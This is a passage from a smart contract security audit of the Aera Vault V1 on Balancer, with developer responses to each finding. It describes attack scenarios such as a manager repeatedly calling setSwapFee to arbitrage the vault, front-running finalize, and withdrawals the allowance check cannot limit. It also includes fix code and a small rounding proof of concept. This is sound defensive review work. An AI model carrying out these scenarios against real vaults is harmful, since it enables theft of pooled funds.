updates. We will take the following actions for V1: • Advise treasuries against making large deposits • For sensitive/larger deposits, offer an option to reject the transaction if balances have been changed in the block (lastChangeBlock), implemented in PR #138. • Advise treasuries to use flash bots when possible Spearbit: Actions taken on a procedural and not technical level. 9 +5.2.3 allowance() doesn’t limit withdraw()s Severity: High Risk Context: PermissiveWithdrawalValidator.sol#L17-L27, IWithdrawalValidator.sol, AeraVaultV1.sol#L456-L514 Description: The allowance() function is meant to limit withdraw amounts. However, allowance() can only read and not alter state because its visibility is set to view. Therefore, the withdraw() function can be called on demand until the entire Vault/Pool balance has been drained, rendering the allowance() function ineffective. function withdraw(uint256[] calldata amounts) ... { ... uint256[] memory allowances = validator.allowance(); ... for (uint256 i = 0; i < tokens.length; i++) { if (amounts[i] > holdings[i] || amounts[i] > allowances[i]) { revert Aera__AmountExceedAvailable(... ); } } } // can't update state due to view function allowance() external view override returns (uint256[] memory amounts) { amounts = new uint256[](count); for (uint256 i = 0; i < count; i++) { amounts[i] = ANY_AMOUNT; } } from both IWithdrawal- Recommendation: Remove the view keyword from the allowance() template, e.g. Validator.sol and PermissiveWithdrawalValidator.sol to be able to update state in future versions of al- lowance(). Gauntlet: I would say we need an additional callback to the Validator to notify it of actual withdraw amounts. In case when allowance is greater than holdings there is no way for the Validator to know how much of its allowance was actually used. +5.2.4 Managed Pools are still undergoing development and may contain bugs and/or significant changes Severity: High Risk Context: balancer-v2-monorepo Description: The ManagedPool smart pool implementation of WeightedPool is still in active development by the Balancer team and could have unknown bugs. Additionally, the current version in balancer’s github is different from the version used in Mannon Vault. Note: The Gauntlet team has also flagged this as an issue. Recommendation Use the latest version of ManagedPool. Consider using new functionalities like AUM (manage- mentAumFeePercentage) fees. Also see the following issues: • Check with Balancer team about best approach to add and remove funds • Manager can cause an immediate weight change • Important fields of Balancer can be overwritten by EndTime Only deploy once ManagedPool is stable and considered production ready. Gauntlet: Fix implemented in PR #11. We should still update to the latest version at this stage (and continue to do so). 10 Spearbit: Acknowledged. +5.2.5 Malicious manager could cause Vault funds to be inaccessible Severity: High Risk Context: AeraVaultV1.sol#L794-L822 Description: The calculateAndDistributeManagerFees() function pushes tokens to the manager and if for unknown reasons this action fails the entire Vault would be blocked and funds become inaccessible. This occurs because the following functions depend on the execution of calculateAndDistributeManagerFees(): deposit(), withdraw(), setManager(), claimManagerFees(), initiateFinalization(), and therefore final- ize() as well. Within calculateAndDistributeManagerFees() the function safeTransfer() is the riskiest and could fail under the following situations: • A token with a callback is used, for example an ERC777 token, and the callback is not implemented correctly. • A token with a blacklist option is used and the manager is blacklisted. For example USDC has such blacklist functionality. Because the manager can be an unknown party, a small risk exist that he is malicious and his address could be blacklisted in USDC. Note: set as high risk because although probability is very small, impact results in Vault funds to become inacces- sible. function calculateAndDistributeManagerFees() internal { ... for (uint256 i = 0; i < amounts.length; i++) { tokens[i].safeTransfer(manager, amounts[i]); } } Recommendation: Beware of including tokens with callbacks such as ERC777 tokens into the Vault. Additionally, use a pull over push pattern to let the manager retrieve fees. This way the Vault can never get blocked. This recommendation can be implemented as follows: • Rename calculateAndDistributeManagerFees() to calculateManagerFees(). • In calculateManagerFees() add up all management fees (for each manager address separate (e.g. to prevent having to push the fees in setManager() + keep track of total of the fees in a mapping), (managersFeeTotal) to make sure fees are not withdrawn); • In withdraw() and returnFunds() make sure unclaimed fees cannot be withdrawn. • Let the manager retrieve fees via claimManagerFees(), use msg.sender as index to the mapping with the fees. This function should retrieve Balancer funds, e.g. use the code of the second half of function calcu- lateAndDistributeManagerFees(). It should also lower managersFeeTotal and the fee for msg.sender. This also alleviates rounding issues with fees and reduces gas used by deposit() which could be relevant when pools are deployed with a large number of tokens. An alternative could be to use try/catch around the call to safeTransfer(), but this way the fees aren’t distributed properly. Gauntlet: We will be incorporating the suggestions. 11 +5.2.6 updateWeightsGradually allows change rates to start in the past with a very high maximumRatio Severity: High Risk Context: AeraVaultV1.sol#L599-L639 Description: The current updateWeightsGradually is using startTime instead of time that should be Math.max(block.timestamp, startTime). Because internally Balancer will use startTime = Math.max(currentTime, startTime); as the startTime, this allows to: the minimal start • Have a startTime in the past. • Have a targetWeights[i] higher than allowed. We also suggest adding another check to prevent startTime > endTime. Although Balancer replicates the same check it is still needed in the Aera implementation to prevent transactions to revert because of an underflow error on uint256 duration = endTime - startTime; Recommendation: Update the code to correctly initialize the startTime value and add a check to prevent having endTime in the past (startTime > endTime). A possible solution looks as follows: startTime = Math.max(block.timestamp, startTime); if ( startTime > endTime ) { function updateWeightsGradually( ... ) ... { + + + + revert Aera__WeightChangeEndBeforeStart(); } if ( Math.max(block.timestamp, startTime) + startTime + MINIMUM_WEIGHT_CHANGE_DURATION > endTime ) { revert Aera__WeightChangeDurationIsBelowMin(...) endTime - startTime, MINIMUM_WEIGHT_CHANGE_DURATION // no longer reverts ); } ... - + } Gauntlet: Recommendation implemented in PR #146 Spearbit: Acknowledged. +5.2.7 The vault manager has unchecked power to create arbitrage using setSwapFees Severity: High Risk Context: AeraVaultV1.sol#L663-L679, BasePool.sol#L58-L59 Description: A previously known issue was that a malicious vault manager could arbitrage the vault like in the below scenario: 1. Set the swap fees to a high value by setSwapFee (10% is the maximum). 2. Wait for the market price to move against the spot price. 3. In the same transaction, reduce the swap fees to ~0 (0.0001% is the minimum) and arbitrage the vault. The proposed fix was to limit the percentage change of the swap fee to a maximum of MAXIMUM_SWAP_FEE_- PERCENT_CHANGE each time. However, because there is no restriction on how many times the setSwapFee function can be called in a block or transaction, a malicious manager can still call it multiple times in the same transaction and eventually set the swap fee to the value they want. Recommendation: Enforce a cooldown period of reasonable length between two consecutive setSwapFee func- tion calls. 12 +5.2.8 Implement a function to claim liquidity mining rewards Severity: High Risk Context: AeraVaultV1.sol Description: Balancer offers a liquidity mining rewards distribution for liquidity providers. Liquidity Mining distributions are available to claim weekly through the MerkleOrchard contract. Liquid- ity Providers can claim tokens from this contract by submitting claims to the tokens. These claims are checked against a Merkle root of the accrued token balances which are stored in a Merkle tree. Claim- ing through the MerkleOrchard is much more gas-efficient than the previous generation of claiming contracts, especially when claiming multiple weeks of rewards, and when claiming multiple tokens. The AeraVault is itself the only liquidity provider of the Balancer pool deployed, so each week it’s entitled to claim those rewards. Currently, those rewards cannot be claimed because the AeraVault is missing an implementation to interact with the MerkleOrchard contract, causing all rewards (BAL + other tokens) to remain in the MerkleOrchard forever. Recommendation: Add a function to allow the vault owner (the Treasury) to claim those rewards. More information on how to claim rewards and interact with the contract can be found directly in the Balancer Documentation website. Rewards claimed by the AeraVault can be lately distributed to the Treasury via the sweep function. Gauntlet: Recommendation implemented in PR #146. Spearbit: Acknowledged. 5.3 Medium Risk +5.3.1 Owner can circumvent allowance() via enableTradingWithWeights() Severity: Medium Risk Context: AeraVaultV1.sol#L564-L593 Description: The vault Owner can set arbitrary weights via disableTrading() and then call enableTrading- WithWeights() to set the spot price and create arbitrage opportunities for himself. This way allowance() in withdraw() checks, which limit the amount of funds an owner can withdraw, can be circumvented. Something similar can be done with enableTradingRiskingArbitrage() in combination with sufficient time. Also see the following issues: • allowance() doesn’t limit withdraw()s • enableTradingWithWeights allow the Treasury to change the pool’s weights even if the swap is not disabled • Separation of concerns Owner and Manager function disableTrading() ... onlyOwnerOrManager ... { setSwapEnabled(false); } function enableTradingWithWeights(uint256[] calldata weights) ... onlyOwner ... { ... pool.updateWeightsGradually(timestamp, timestamp, weights); setSwapEnabled(true); } function enableTradingRiskingArbitrage() ... onlyOwner ... { setSwapEnabled(true); } 13 Recommendation: Consider allowing only the manager to execute the disableTrading() function although this also has disadvantages. Additionally, use an oracle to determine spot price (as is already envisioned for the next versions of the protocol). Gauntlet: For safety reasons we want the treasury to have full control over trading. Given our current trust model, this is won’t be an issue for V1 so no action will be taken at this time. Spearbit: Acknowledged. +5.3.2 Front-running attacks on finalize could affect received token amounts Severity: Medium Risk Context: AeraVaultV1.sol#L539, AeraVaultV1.sol#L899-L910 Description: The returnFunds() function (called by finalize()) withdraws the entire holdings in the Balancer pool but does not allow the caller to specify and enforce the minimum amount of received tokens. Without such check the finalize() function could be susceptible to a front-running attack. A potential exploit scenario looks as follows: 1. The notice period has passed and the Treasury calls finalize() on the Aera vault. Assume the Balancer pool contains 1 WETH and 3000 DAI, and that WETH and DAI weights are both 0.5. 2. An attacker front-runs the Treasury’s transaction and swaps in 3000 DAI to get 0.5 WETH from the pool. 3. As an unexpected result, the Treasury receives 0.5 WETH and 6000 DAI. Therefore an attacker can force the Treasury to accept the trade that they offer. Although the Treasury can execute a reverse trade on another market to recover the token amount and distribution, not every Treasury can execute such trade (e.g., if a timelock controls it). Notice that the attacker may not profit from the swap because of slippage but they could be incentivized to perform such an attack if it causes considerable damage to the Treasury. Recommendation: Possible mitigations include: • Allowing the caller to specify the minimum amount of each token and revert the transaction if not enough tokens are available. • Adopting a two-step finalization pattern. First, disable trading and check if the token amounts in the Balancer pool are as desired. If not, enable trading again and let arbitragers re-balance the pool. Once rebalanced, finalize the vault. • Use Flashbots to reduce front-running probabilities. Gauntlet: Based on our latest thinking, trading should be paused when initiateFinalization is run. That should resolve this issue. It is worth not- Spearbit: setSwapEnabled(false) has been added in initiateFinalization() in PR #137. ing that pausing trading does not completely solve the issue. If initiateFinalization() happens to be front run (although not profitable for a frontrunner, it could still happen), then the token distributions could still be off. This situation should probably be detected (manually?) and corrected with enableTradingWithWeights() and disableTrading(). Gauntlet: I think there are 2 things that are important: • If the treasury is using withdraw and asking for a specific amount of tokens, that they don’t get less than that. If there happens to be a front-running transaction, just like in an AMM they may not be able to withdraw what they want • If the treasury is finalizing they should expect to retain a decent amount of the value of the pool, but since it’s a liquidity share in an AMM, there aren’t guarantees about the specific ratios of token amounts. The only guarantee is the relationship between token weights, balances and spot prices. Spearbit: The value indeed stays the same. Only if the token distribution would be important you would want to solve this. 14 Assuming the token distribution doesn’t matter then you might as well keep the code as is (unless there are other reasons to change). [e.g frontrun of initiateFinalization() + trade pause has the same effect as frontrun of finalize() while trade hasn’t been paused ] Gauntlet: I still like the proposal as we see other benefits in pausing trading. Since trading is primarily a means of rebalancing execution, we can shut it off post initiation of finalization to mitigate impermanent loss for the treasury. Spearbit: Acknowledged. Beware that enableTradingWithWeights(), enableTradingRiskingArbitrage()and disableTrading() still work after initiateFinalization(). This could be put to good use but also unwanted (in that case additional checks are required in these functions). +5.3.3 safeApprove in depositToken could revert for non-standard token like USDT Severity: Medium Risk Context: AeraVaultV1.sol#L893 Description: Some non-standard tokens like USDT will revert when a contract or a user tries to approve an al- lowance when the spender allowance has already been set to a non zero value. In the current code we have not seen any real problem with this fact because the amount retrieved via depositToken() is approved send to the Balancer pool via joinPool() and managePoolBalance(). Balancer transfers the same amount, lowering the approval to 0 again. However, if the approval is not lowered to exactly 0 (due to a rounding error or another unfore- seen situation) then the next approval in depositToken() will fail (assuming a token like USDT is used), blocking all further deposits. Note: Set to medium risk because the probability of this happening is low but impact would be high. We also should note that OpenZeppelin has officially deprecated the safeApprove function, suggesting to use instead safeIncreaseAllowance and safeDecreaseAllowance. Recommendation: Adopt a safer approach to cover edge cases such as the abovementioned USDT token and implement the following solution: function depositToken(IERC20 token, uint256 amount) internal { token.safeTransferFrom(owner(), address(this), amount); token.safeApprove(address(bVault), amount); uint256 allowance = token.allowance(address(this), address(bVault)); if (allowance > 0) { token.safeDecreaseAllowance(address(bVault), allowance); } token.safeIncreaseAllowance(address(bVault), amount); - + + + + + } Please note that the amount that should be used as a parameter for safeIncreaseAllowance should follow the recommendations written in issue Fee on transfer can block several functions. +5.3.4 Consult with Balancer team about best approach to add and remove funds Severity: Medium Risk Context: AeraVaultV1.sol Description: The Aera Vault uses AssetManager’s functionality of function managePoolBalance() to add and remove funds. The standard way to add and remove funds in Balancer is via joinPool() / exitPool(). Using the managePoolBalance() function might lead to future unexpected behavior. Additionally, this disables the capacity to implement the original intention of AssetManagers functionality, e.g. storing funds elsewhere to generate yield. Recommendation: Doublecheck with the Balancer team which is the best approach to implement. If either ways are nonoptimal ask them to implement the functionality to support this. 15 In case the joinPool() / exitPool() path is recommended by the Balancer team, it can probably be implemented in the following way: • Limit access to joinPool() via allowlist (as is already done) • Limit access to exitPool() via a custom pool with an onExit() callback function (which could also integrate allowance() ) • Adjust the spotprice after joinPool() / exitPool() via updateWeights(). • Perhaps use the AUM (managementAumFeePercentage) fees. • Only keep the BPT (pool tokens) in the vault. Gauntlet: Both ways are probably not the "intended" use case, current version seems a bit more elegant code- wise. We will get in touch with Balancer team about the best way to use these low-level functions. Spearbit: Acknowledged. +5.3.5 Fee on transfer can block several functions Severity: Medium Risk Context: AeraVaultV1.sol#L456-L514 Description: Some tokens have a fee on transfer, for example USDT. Usually such fee is not enabled but could be re-enabled at any time. With this fee enabled the withdrawFromPool() function would receive slightly less tokens than the amounts requested from Balancer causing the next safeTransfer() call to fail because there are not enough tokens inside the contract. This means withdraw() calls will fail. Functions deposit() and calculateAndDistributeManagerFees() can also fail because they have similar code. Note: The function returnFunds() is more robust and can handle this problem. Note: The problem can be alleviated by sending additional tokens directly to the Aera Vault contract to compensate for fees, lowering the severity of the problem to medium. function withdraw(uint256[] calldata amounts) ... { ... withdrawFromPool(amounts); // could get slightly less than amount with a fee on transfer ... for (uint256 i = 0; i < amounts.length; i++) { if (amounts[i] > 0) { tokens[i].safeTransfer(owner(), amounts[i]); // could revert it the full amounts[i] isn't ,! available ... } ... } } Recommendation: Check the balanceOf() tokens before and after a safeTransfer() or safeTransferFrom(). Use the difference as the amount of tokens sent/received. 16 +5.3.6 enableTradingWithWeights allow the Treasury to change the pool’s weights even if the swap is not disabled Severity: Medium Risk Context: AeraVaultV1.sol#L574-L583 Description: enableTradingWithWeights is a function that can only be called by the owner of the Aera Vault contract and that should be used only to re-enable the swap feature on the pool while updating token weights. The function does not verify if the pool’s swap feature is enabled and for this reason, as a result, it allows the Treasury to act as the manager who is the only actor allowed to change the pool weights. The function should add a check to ensure that it is only callable when the pool’s swap is disabled. Recommendation: Update the function to revert when the pool’s swap is enabled. function enableTradingWithWeights(uint256[] calldata weights) external override onlyOwner whenInitialized { + + + + } bool isSwapEnabled = pool.getSwapEnabled(); if( isSwapEnabled ) { revert Aera__PoolSwapIsAlreadyEnabled(); } uint256 timestamp = block.timestamp; pool.updateWeightsGradually(timestamp, timestamp, weights); setSwapEnabled(true); Gauntlet: Fixed in PR #126. Spearbit: Acknowledged. +5.3.7 AeraVault constructor is not checking all the input parameters Severity: Medium Risk Context: AeraVaultV1.sol#L260-L345 Description: The Aera Vault constructor has the role to handle Balancer’s ManagedPool deployment. The con- structor should increase the number of user input validation and the Gauntlet team should be aware of the possible edge case that could happen given that the deployment of the Aera Vault is handled directly by the Treasury and not by the Gauntlet team itself. We are going to list all the worst-case scenarios that could happen given the premise that the deployments are handled by the Treasury. 1. factory could be a wrapper contract that will deploy a ManagedPool. This would mean that the deployer could pass correct parameters to Aera Vault to pass these checks, but will use custom and malicious parameters on the factory wrapper to deploy the real Balancer pool. 2. swapFeePercentage value is not checked. On Balancer, the deployment will revert if the value is not in- side this range >= 1e12 (0.0001%) and <= 1e17 (10% - this fits in 64 bits). Without any check, the Gauntlet accept to follow the Balancer’s swap requirements. 3. manager_ is not checked. They could set the manager as the Treasury (owner of the vault) itself. This would give the Treasury the full power to manage the Vault. At least these values should be checked: address(0), address(this) or owner(). The same checks should also be done in the setManager() function. 4. validator_ could be set to a custom contract that will give full allowances to the Treasury. This would make the withdraw() act like finalize() allowing to withdraw all the funds from the vault/pool. 17 5. noticePeriod_ has only a max value check. Gauntlet team explained that a time delay between the ini- tialization of the finalize process and the actual finalize is needed to prevent the Treasury to be able to instantly withdraw all the funds. Not having a min value check allow the Treasury to set the value to 0 so there would be no delay between the initiateFinalization() and finalize() because noticeTimeoutAt == block.timestamp. 6. managementFee_ has no minimum value check. This would allow the Treasury to not pay the manager because the managerFeeIndex would always be 0. 7. description_ can be empty. From the Specification PDF, the description of the vault has the role to “De- scribes vault purpose and modelling assumptions for differentiating between vaults”. Being empty could lead to a bad UX for external services that needs to differentiate different vaults. These are all the checks that are done directly by Balancer during deployment via the Pool Factory: • BasePool constructor#L94-L95 min and max number of tokens. • BasePool constructor#L102token array is sorted following Balancer specification (sorted by token address). • BasePool constructor calling _setSwapFeePercentage min and max value for swapFeePercentage. • BasePool constructor calling vault.registerTokens token address uniqueness (can’t have same Following the pathBasePool is calling from function _registerMinimalSwapInfoPoolTokens it also checks that token != IERC20(0). should that call token in the pool), vault.registerTokens MinimalSwapInfoPoolsBalance. • ManagedPool constructor calling _startGradualWeightChange Check min value of weight and that the total sum of the weights are equal to 100%. _startGradualWeightChange internally check that endWeight >= WeightedMath._MIN_WEIGHT and normalizedSum == FixedPoint.ONE. Recommendation: • Create a factory to wrap both AeraVault and Validator deployment to reduce influence and possible mali- cious attack from external actors. • Add a custom min/max value check for swapFeePercentage on top of Balancer’s check if needed. • Add checks on manager_ value to prevent an empty manager (address(0)) or that the manager andAeraVault owner will be equal to the Treasury itself. • Added a min value check to the noticePeriod_ parameter if needed to prevent that the time between ini- tiateFinalization and finalize call is too small. • Add a min value check to the managementFee_ parameter if needed to prevent the Treasury to not pay the manager. • Add a check on description_ to prevent to deploy a AeraVault with an empty description that would create confusion on web application that will display similar vaults. • Check meticulously that future Balancer’s version still maintain the same checks listed above. Consider replicating those checks during deployment to be future-proof. We also recommend carefully documenting the possible consequences of supporting "special" types of tokens: • Token with more than 18 decimals that are not supported by Balancer. • Token with small number of decimals. • ERC777 tokens. • Token with fees on transfer. • Token with blacklisting capabilities. Gauntlet: In our trust model, we only decide to manage the vault if it has been correctly deployed. So leaving the focus to be on human error, I think the following are actionable: 3. (manager checks) 18 Add checks on manager_ value to prevent an empty manager (address(0)) or that the manager and Aera Vault owner will be equal to the Treasury itself 4. (description checks) Add a check on description_ to prevent to deploy a Aera Vault with an empty description that would create confusion on web application that will display similar vaults. I’ll also take a documentation action for these: Token with more than 18 decimals that are not supported by Balancer Token with small number of decimals ERC777 tokens Token with fees on transfer Token with blacklisting capabilities +5.3.8 Possible mismatch between Validator.count and AeraVault assets count Severity: Medium Risk Context: PermissiveWithdrawalValidator.sol#L13, AeraVaultV1.sol#L456-L514 Description: A weak connection between WithdrawalValidator and Aera Vault could lead to the inability of withdrawing from a Vault. Consider the following scenario: The Validator is deployed with a tokenCount < than Vault.getTokens().length. Inside the withdraw() function we reference the following code block: uint256[] memory allowances = validator.allowance(); uint256[] memory weights = getNormalizedWeights(); uint256[] memory newWeights = new uint256[](tokens.length); for (uint256 i = 0; i < tokens.length; i++) { if (amounts[i] > holdings[i] || amounts[i] > allowances[i]) { revert Aera__AmountExceedAvailable( address(tokens[i]), amounts[i], holdings[i].min(allowances[i]) ); } } A scenario where allowances.length < tokens.length would cause this function to revert with an Index out of bounds error. The only way for the Treasury to withdraw funds would be via the finalize() method which has a time delay. Recommendation: Ensure that when Aera Vault and Validator are deployed, Validator.count is the same as the number of assets managed by the vault. A potential solution is to create a Factory contract that will deploy both the Aera Vault and the Validator. In such case remember to correctly set up the Aera Vault Ownable contract because the current deployer is also the Vault’s owner and in the case of a Factory, the owner of the vault would be the Factory itself. This would cause all onlyOwner calls to revert. Additionally, see the following issue: Ensure integrity of deployment of vault. Gauntlet: I think we are ok with trusting the treasury to deploy the validator. The main reason being is that we don’t see a simple way to parametrize validators at the moment and each treasury partner will be highly trusted early on so we’d be starting with permissive validators and then leaning on treasuries to suggest some custom validators first. Checked on allowances.length added in PR #141. Spearbit: Acknowledged. 19 5.4 Low Risk +5.4.1 Ensure vault’s deployment integrity Severity: Low Risk Context: AeraVaultV1.sol Description: The treasury could deploy on purpose or by accident a slightly different version of the contract and introduce bugs or backdoors. This might not be recognized by parties taking on Manager responsibilities (e.g. usually Gauntlet will be involved here). Recommendation: Consider using a factory to deploy the contract(s), so only parameters can be set. Gauntlet: We are ok with trusting the treasury to deploy the validator. The main reason being is that we don’t see a simple way to parametrize validators at the moment and each treasury partner will be highly trusted early on so we’d be starting with permissive validators and then leaning on treasuries to suggest some custom validators first. Spearbit: Acknowledged. +5.4.2 Frequent calling of calculateAndDistributeManagerFees() lowers fees Severity: Low Risk Context: AeraVaultV1.sol#L682-L690, IManagerAPI.sol#L24-L25 Description: Via calculateAndDistributeManagerFees() a percentage of the Pool is subtracted and sent to the Manager. If this function is called too frequently his fees will be lower. For example: • If he calls it twice, while both time getting 1%, he actually gets: 1% + 1% * (100% - 1%) = 1.99% • If he waits longer until he has earned 2%, he actually gets: 2%, which is slightly more than 1.99% • If called very frequently the fees go to 0 (especially taking in account the rounding down). However the gas cost would be very high. The Manager can (accidentally) do this by calling claimManagerFees(). The Owner can (accidentally or on pur- pose (e.g. using 0 balance change) ) do this by calling deposit(), withdraw() or setManager(). Note: Rounding errors make this slightly worse. Also see the following issue: Possible rounding down of fees function claimManagerFees() ... { calculateAndDistributeManagerFees(); // get a percentage of the Pool } Recommendation: Encourage managers to not claim fees too often. For example, Natspec comments regarding the claimManagerFees() function inside the IManagerAPI.sol contract document that the function should not be called frequently. Because the Owner is end responsible for the Vault and the gas costs most likely outweigh the fees it is probably not worth taking actions. Gauntlet: Added comment on claimManagerFees() in PR #138. Spearbit: Acknowledged. 20 +5.4.3 OpenZeppelin best practices Severity: Low Risk Context: AeraVaultV1.sol#L4-L11 Description: The Aera Vault uses OpenZeppelin release 4.3.2 which is copied into their github. The current release of OpenZeppelin is 4.6.0 and includes several updates and security fixes. The copies of the OpenZeppelin files are also (manually) changed to adapt the import paths. This has the risk of making a mistake in the process. import "./dependencies/openzeppelin/SafeERC20.sol"; import "./dependencies/openzeppelin/IERC20.sol"; import "./dependencies/openzeppelin/IERC165.sol"; import "./dependencies/openzeppelin/Ownable.sol"; import "./dependencies/openzeppelin/ReentrancyGuard.sol"; import "./dependencies/openzeppelin/Math.sol"; import "./dependencies/openzeppelin/SafeCast.sol"; import "./dependencies/openzeppelin/ERC165Checker.sol"; Recommendation: Use recent versions and consider OpenZeppelin best practices: • Quite a lot of project seem to use NPM install which leaves the risk for a supply chain attack on NPM. Another way would be to retrieve it from from OpenZeppelin releases repository but this also leaves the risk for a github supply chain attack. • Preferably don’t change the contracts to prevent mistakes. • OpenZeppelin has a way to alert projects of vulnerabilities before public disclosures. • Monitor the updates to the releases. • Update to a new release if relevant bugfixes are applied. With every large release make sure a recent version of the OpenZeppelin contracts is used (but preferably also somewhat battle tested). +5.4.4 Possible rounding down of fees Severity: Low Risk Context: AeraVaultV1.sol#L794-L822 Description: If certain token has a few decimals numbers then fees could be rounded down to 0, especially if time between calculateAndDistributeManagerFees() is relatively small. This also could slightly shift the spot price because the balance of one coin is lowered while the other remains still. With fewer decimals the situation worsens, e.g. Gemini USD GUSD has 2 decimals, therefore the problem occurs with a balance of 10_000 GUSD. Note: The rounding down is probably neglectable in most cases. function calculateAndDistributeManagerFees() internal { ... for (uint256 i = 0; i < tokens.length; i++) { amounts[i] = (holdings[i] * managerFeeIndex) / ONE; // could be rounded down to 0 } ... } With 1 USDC in the vault and 2 hours between calculateAndDistributeManagerFees(), the fee for USDC is rounded down to 0. This behavior is demonstrated in the following POC: 21 import "hardhat/console.sol"; contract testcontract { uint256 constant ONE = 10**18; uint managementFee = 10**8; constructor() { // MAX_MANAGEMENT_FEE = 10**9; // 1 USDC uint holdings = 1E6; uint delay = 2 hours; uint managerFeeIndex = delay * managementFee; uint amounts = (holdings * managerFeeIndex) / ONE; console.log("Fee",amounts); // fee is 0 } } Recommendation: Consider implementing one (or more) of the following suggestions: 1. Sum all the fees and only claim and transfer them on the initiative of the manager. This solves other issues such as Malicious manager could result in inaccessible funds of the Vault. 2. Accept the rounding issue and document it. Do verify that the impact on the Pool price and the management fees is indeed neglectable. Managers could also be reimbursed manually if necessary. 3. If the potential change in the Pool price cannot be ignored: update the weights like withdraw() is doing. 4. Round the manager fees up. Perhaps only when they are 0. However be aware of repeatedly calling claim- ManagerFees() which could then get additional fees, although this is probably less than the gas costs. 5. Don’t list tokens with a low number of decimals. Gauntlet: We like 1 and 5. We think with 1, we would need to adjust the sweep function to disallow claiming vault tokens. Spearbit: we would need to adjust the sweep function to disallow claiming vault tokens. We would suggest to only claim the tokens from the vault when the manager claims them (e.g. have as few claims as possible as this prevents rounding issues) That way you don’t have to change sweep Gauntlet: Makes sense. FYI - if you claim too early, then you lose a little bit of value. +5.4.5 Missing nonReentrant modifier on initiateFinalization(), setManager() and claimManagerFees() functions Severity: Low Risk Context: AeraVaultV1.sol#L517, AeraVaultV1.sol#L545, AeraVaultV1.sol#L682 Description: The initiateFinalization() function is missing a nonReentrant modifier while calculateAnd- DistributeManagerFees() executes external calls. Same goes for setManager() and claimManagerFees() func- tions. Recommendation: Consider adding the nonReentrant modifier to functions that perform external calls. Gauntlet: Solved in PR #112. Spearbit: Acknowledged. 22 +5.4.6 Potential division by 0 Severity: Low Risk Context: AeraVaultV1.sol#L402-L514, AeraVaultV1.sol#L728-L749 Description: If the balance (e.g. holdings[]) of a token is 0 in deposit() then the dividing by holdings[] would cause a revert. Note: Function withdraw() has similar code but when holdings[]==0 its not possible to withdraw() anyway. Note: The current Mannon vault code will not allow the balances to be 0. Note: Although not used in the current code, in order to do a deregisterTokens(), Balancer requires the balance to be 0. Additionally, refer to the following Balancer documentation about the-vault#deregistertokens. The worst case scenario is deposit() not working. function deposit(uint256[] calldata amounts) ... { ... for (uint256 i = 0; i < amounts.length; i++) { if (amounts[i] > 0) { depositToken(tokens[i], amounts[i]); uint256 newBalance = holdings[i] + amounts[i]; newWeights[i] = (weights[i] * newBalance) / holdings[i]; // would revert if holdings[i] == 0 } ... ... } Similar divisions by 0 could occur in getWeightChangeRatio(). The function is called from updateWeightsGradu- ally(). If this is due to targetWeight being 0, then it is the desired result. Current weight should not be 0 due balancer checks. function getWeightChangeRatio(uint256 weight, uint256 targetWeight) ... { return weight > targetWeight ? (ONE * weight) / targetWeight : (ONE * targetWeight) / weight; // could revert if targetWeight == 0 // could revert if weight== 0 } Recommendation: Determine what should happen in the unlikely event that balances become 0 in deposit() and adapt the code if necessary. If it is relevant to return readable revert/error messages then the division by 0 situation could be intercepted and trigger a direct revert. Gauntlet: The code should revert with 0 balances since having 0 at either side of the AMM pool breaks spot prices and the ability to offer trades. Balancer does not allow 0 weight so this would be ok. +5.4.7 Use ManagedPoolFactory instead of BaseManagedPoolFactory to deploy the Balancer pool Severity: Low Risk Context: AeraVaultV1.sol#L305-L321, AeraVaultV1Fork.ts#L219-L223 Description: Currently the Aera Vault is using BaseManagedPoolFactory as the factory to deploy the Balancer pool while Balancer’s documentation recommends and encourages the usage of ManagedPoolFactory. Quoting the doc inside the BaseManagedPoolFactory: This is a base factory designed to be called from other factories to deploy a ManagedPool with a particular controller/owner. It should NOT be used directly to deploy ManagedPools without controllers. ManagedPools controlled by EOAs would be very dangerous for LPs. There are no restrictions on what the managers can do, so a malicious manager could easily manipulate prices and drain the pool. In this design, other controller-specific factories will deploy a pool controller, then call this factory to deploy the pool, passing in the controller as the owner. 23 Recommendation: Use ManagedPoolFactory instead of BaseManagedPoolFactory to deploy the Balancer pool following Balancer’s best practices. Gauntlet: Solved in PR #141. Spearbit: Acknowledged. +5.4.8 Adopt the two-step ownership transfer pattern Severity: Low Risk Context: AeraVaultV1.sol#L762-L764, Ownable.sol#L61-L64 Description: To prevent the Aera vault Owner, i.e. the Treasury, from calling renounceOwnership() and effec- tively breaking vault critical functions such as withdraw() and finalize(), the renounceOwnership() function is explicitly overridden to revert the transaction every time. However, the transferOwnership() function may also lead to the same issue if the ownership is transferred to an uncontrollable address because of human errors or attacks on the Treasury. Recommendation: Adopt the two-step ownership transfer pattern: (1) the owner sets the new owner, and (2) the new owner accepts the ownership. Gauntlet: Solved in PR #132. Spearbit: Acknowledged. +5.4.9 Implement zero-address check for manager_ Severity: Low Risk Context: AeraVaultV1.sol#L267 Description: Non-existent zero-address checks inside the constuctor for the manager_ parameter. If manager_- becomes a zero address then calls to calculateAndDistributeManagerFees will burn tokens (transfer them to address(0)). Recommendation: Implement zero-address check for manager_ user input. Example: require(manager_ != address(0), "manager_: zero address"); Gauntlet: Fix implemented in PR #101. Spearbit: Acknowledged. 24 5.5 Gas Optimization +5.5.1 Simplify tracking of managerFeeIndex Severity: Gas Optimization Context: AeraVaultV1.sol#L769-L774, AeraVaultV1.sol#L794-L822, AeraVaultV1.sol#L70 Description: The calculateAndDistributeManagerFees() function uses updateManagerFeeIndex() to keep track of management fees. It keeps track of both managerFeeIndex and lastFeeCheckpoint in storage vari- ables (e.g. costing SLOAD/SSTORE). However, because managementFee is immutable this can be simplified to one storage variable, saving gas and improving code legibility. uint256 public immutable managementFee; // can't be changed function calculateAndDistributeManagerFees() internal { updateManagerFeeIndex(); ... if (managerFeeIndex == 0) { return; use managerFeeIndex } ... // ... managerFeeIndex = 0; ... } function updateManagerFeeIndex() internal { managerFeeIndex += (block.timestamp - lastFeeCheckpoint) * managementFee; lastFeeCheckpoint = block.timestamp.toUint64(); } Recommendation: Consider changing the code as follows: function calculateAndDistributeManagerFees() internal { if (block.timestamp <= lastFeeCheckpoint) { return; } if (managementFee == 0) { return; } uint managerFeeIndex = (block.timestamp - lastFeeCheckpoint) * managementFee; is a local variable now lastFeeCheckpoint = block.timestamp; ... // use managerFeeIndex // managerFeeIndex ,! } Remove the updateManagerFeeIndex() function. Spearbit: Partly solved in PR #145, with a few attention points: • managerFeeIndex could be local variable to safe gas (no need to store it between calls). • In case managementFee happens to be 0 then gas is wasted (updated the recommendation above). 25 +5.5.2 Directly call getTokensData() from returnFunds() Severity: Gas Optimization Context: AeraVaultV1.sol#L899-L910, AeraVaultV1.sol#L700-L708, AeraVaultV1.sol#L728-L749 